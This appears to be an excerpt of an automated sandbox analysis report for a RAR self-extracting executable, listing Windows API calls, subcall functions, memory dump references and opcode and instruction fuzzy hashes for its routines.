                                                                                    • __EH_prolog.LIBCMT ref: 00728289
                                                                                      • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
                                                                                      • Part of subcall function 0072A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 2506663941-0
                                                                                    • Opcode ID: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
                                                                                    • Instruction ID: ca0473e300d949835e80a01aafb6c13adbe4f5e2ec7d96ab6497bb3ca089f195
                                                                                    • Opcode Fuzzy Hash: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
                                                                                    • Instruction Fuzzy Hash: DB41B871945668DADB20EB60DC59AEEB3B8BF10304F4404EBE14A57083EB795FC5CB51
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 007213E1
                                                                                      • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                      • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
                                                                                      • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
                                                                                    • Instruction ID: 979f42b91b62af22fc69bfa6a0b135a87016bd7abcb1f0a40a14d3b91579e321
                                                                                    • Opcode Fuzzy Hash: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
                                                                                    • Instruction Fuzzy Hash: 23415DB0905B40DEE724DF398889AE6FBE5BF28300F50492EE5FE87282C7356654CB10
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 007213E1
                                                                                      • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                      • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
                                                                                      • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
                                                                                    • Instruction ID: db7f6d9c3f385ac81b0bf5ecb1ccdab9be622274af07af1fa3ea6ddeec1f48b2
                                                                                    • Opcode Fuzzy Hash: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
                                                                                    • Instruction Fuzzy Hash: E8413AB0905B40DEE724DF798889AE6FBE5BF29300F50492ED5FE87282CB756654CB10
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0073B098
                                                                                      • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
                                                                                    • Instruction ID: f2195bb828fe8b2ea82a809d70679526c7a4aa0e698cad56240c6d1306bdc8d9
                                                                                    • Opcode Fuzzy Hash: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
                                                                                    • Instruction Fuzzy Hash: 12319E71C00259DADF15DF64D855AEEBBB4AF19300F5044AEE409B3242D779AF04CB61
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0074ACF8
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
                                                                                    • Instruction ID: 1345c6250d9fee23df933212a0fdbfba1fa5235bdc7c76e2c28e0bfce3efe5dc
                                                                                    • Opcode Fuzzy Hash: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
                                                                                    • Instruction Fuzzy Hash: F311CA33B40625BF9B259F28DC9099A7395EB8436171A8520FD15AB298DB38DD018BE2
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
                                                                                    • Instruction ID: 8e0d87010a66ee6d2e4e84a7e2982be8684e39c9a78e285c6f09310a376ac642
                                                                                    • Opcode Fuzzy Hash: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
                                                                                    • Instruction Fuzzy Hash: 04018233900538EBCF26EBA8DC869DEB775FF88740F054125E912B7152DA38CD14C6A0
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00743C3F
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
                                                                                    • Instruction ID: 77c60563b323183ffd2bf31ad363e4a5a393295e218996c0181634a678b7c6ca
                                                                                    • Opcode Fuzzy Hash: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
                                                                                    • Instruction Fuzzy Hash: 8FF0EC362003169FDF114E68EC4499A7799EF01B617104125FE1DE71D0DB35EA20C7E0
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
                                                                                    • Instruction ID: 7d0e8fd4f42fdcbc3c3c5028e8097820cf0fcc4eb74f6c428113469b6c17734e
                                                                                    • Opcode Fuzzy Hash: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
                                                                                    • Instruction Fuzzy Hash: 17E06D3124623DA7EAF126759C09B9F76489F41BA8F2A4161BC1996091DF6DCC0182E7
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00725AC2
                                                                                      • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: fd461250f5b897ad6a7e58a6eeeb0d68f636b3a9ccdce60cd6a94a2a707c1f5e
                                                                                    • Instruction ID: aa4ddce96ca0a227c7565126fe48c0e30ea1ee8781384a146687d48442595e5e
                                                                                    • Opcode Fuzzy Hash: fd461250f5b897ad6a7e58a6eeeb0d68f636b3a9ccdce60cd6a94a2a707c1f5e
                                                                                    • Instruction Fuzzy Hash: A901AF30810794DAE725EBB8C06A7DEFBE4DF64304F50848DE45653283CBB91B08DBA2
                                                                                    APIs
                                                                                      • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
                                                                                      • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
                                                                                      • Part of subcall function 0072A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1464966427-0
                                                                                    APIs
                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00730E3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExecutionStateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2211380416-0
                                                                                    APIs
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
                                                                                      • Part of subcall function 0073A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                    • String ID:
                                                                                    • API String ID: 1915507550-0
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00731B3E), ref: 0073DD92
                                                                                      • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                      • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                      • Part of subcall function 0073B568: IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                      • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                      • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 897784432-0
                                                                                    APIs
                                                                                    • DloadProtectSection.DELAYIMP ref: 0073E5E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DloadProtectSection
                                                                                    • String ID:
                                                                                    • API String ID: 2203082970-0
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(000000FF,007297BE), ref: 007298C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 2c9b7c4daedf7c3ce857f0a872ffe9a1189b3316f4c7875894da4be305f4885b
                                                                                    • Instruction ID: d676017cb514d46781c14cceb52345243d8f9aea8618019e8bf7f8fc1272e336
                                                                                    • Opcode Fuzzy Hash: 2c9b7c4daedf7c3ce857f0a872ffe9a1189b3316f4c7875894da4be305f4885b
                                                                                    • Instruction Fuzzy Hash: E8B012E129D100FC310461081D06DB7024DC0C0F11730D03FF904E50C2D88C0D0E0533
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 59470f4a5b12aca5291889b6e8b0b133c8a3dc948fd62a782ba71cc2703834a3
                                                                                    • Instruction ID: a26f6f8f0c7f9fc05cd758a056cf613eea9718dca0be05c69ebac4090bb49eb3
                                                                                    • Opcode Fuzzy Hash: 59470f4a5b12aca5291889b6e8b0b133c8a3dc948fd62a782ba71cc2703834a3
                                                                                    • Instruction Fuzzy Hash: 19A001E66AA252BD350962516D1ADBB025DC4C1B2AB30A52EF825A54C2AC88194A1872
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 5e58842bd30a254c357fa976c0af53eebd4ce185181d9d39634e4aa156ecacf7
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: 5e58842bd30a254c357fa976c0af53eebd4ce185181d9d39634e4aa156ecacf7
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 6f65ae3a57c5c9e4a6c05c73d7865f7fb5711b6c6f2a7e30f3e33934150ea7af
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: 6f65ae3a57c5c9e4a6c05c73d7865f7fb5711b6c6f2a7e30f3e33934150ea7af
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: e7035b0119bc030508e03973b0d1c78cbc63c66913dc5ef214bbe68c489101d2
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: e7035b0119bc030508e03973b0d1c78cbc63c66913dc5ef214bbe68c489101d2
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c4c7fd054f964406d19e6916b6d529002463c77d1befbb67d27538f1569862ff
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: c4c7fd054f964406d19e6916b6d529002463c77d1befbb67d27538f1569862ff
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: f853ce3abbf4eca95786ef6eca335f8244e3dea0fbebc008d51c64e301c74df4
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: f853ce3abbf4eca95786ef6eca335f8244e3dea0fbebc008d51c64e301c74df4
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,0072903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00729F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: 28c2e261b8b874c81c2d69744748be02e8821deb9628766301cc9436ebac1738
                                                                                    • Instruction ID: 608cf3bf3e4e5de50400361cd8b054f318acf652fa6f47e000c050cb72a1164e
                                                                                    • Opcode Fuzzy Hash: 28c2e261b8b874c81c2d69744748be02e8821deb9628766301cc9436ebac1738
                                                                                    • Instruction Fuzzy Hash: B8A0243004010D47CD001730CD0404D3711F7107C130041D4500FCF0F1C7174407C700
                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0073AE72,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,0076946A,00000006), ref: 0073AC08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
                                                                                    • Instruction ID: c89f6f938b2502366a7f1a09014f124e335746d3a76d5f912cf93ee1f6f16f43
                                                                                    • Opcode Fuzzy Hash: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
                                                                                    • Instruction Fuzzy Hash: ABA012301006048782000B318F0554E76556F51741F00C024600080030C738C820A504
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,007295D6,?,?,?,?,?,00752641,000000FF), ref: 0072963B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0073C2B1
                                                                                    • EndDialog.USER32(?,00000006), ref: 0073C2C4
                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0073C2E0
                                                                                    • SetFocus.USER32(00000000), ref: 0073C2E7
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0073C321
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0073C358
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0073C36E
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0073C38C
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C39C
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C3B8
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C3D4
                                                                                    • _swprintf.LIBCMT ref: 0073C404
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0073C417
                                                                                    • FindClose.KERNEL32(00000000), ref: 0073C41E
                                                                                    • _swprintf.LIBCMT ref: 0073C477
                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0073C48A
                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0073C4A7
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0073C4C7
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C4D7
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C4F1
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C509
                                                                                    • _swprintf.LIBCMT ref: 0073C535
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0073C548
                                                                                    • _swprintf.LIBCMT ref: 0073C59C
                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0073C5AF
                                                                                      • Part of subcall function 0073AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0073AF35
                                                                                      • Part of subcall function 0073AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0075E72C,?,?), ref: 0073AF84
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                    • String ID: %s %s$%s %s %s$Ps$REPLACEFILEDLG
                                                                                    • API String ID: 797121971-3735763087
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0073F844
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0073F910
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0073F930
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0073F93A
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00726FAA
                                                                                    • _wcslen.LIBCMT ref: 00727013
                                                                                    • _wcslen.LIBCMT ref: 00727084
                                                                                      • Part of subcall function 00727A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00727AAB
                                                                                      • Part of subcall function 00727A9C: GetLastError.KERNEL32 ref: 00727AF1
                                                                                      • Part of subcall function 00727A9C: CloseHandle.KERNEL32(?), ref: 00727B00
                                                                                      • Part of subcall function 0072A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641,000000FF), ref: 0072A1F1
                                                                                      • Part of subcall function 0072A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641), ref: 0072A21F
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00727139
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00727155
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00727298
                                                                                      • Part of subcall function 00729DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007273BC,?,?,?,00000000), ref: 00729DBC
                                                                                      • Part of subcall function 00729DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00729E70
                                                                                      • Part of subcall function 00729620: CloseHandle.KERNELBASE(000000FF,?,?,007295D6,?,?,?,?,?,00752641,000000FF), ref: 0072963B
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3983180755-3508440684
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0072E30E
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
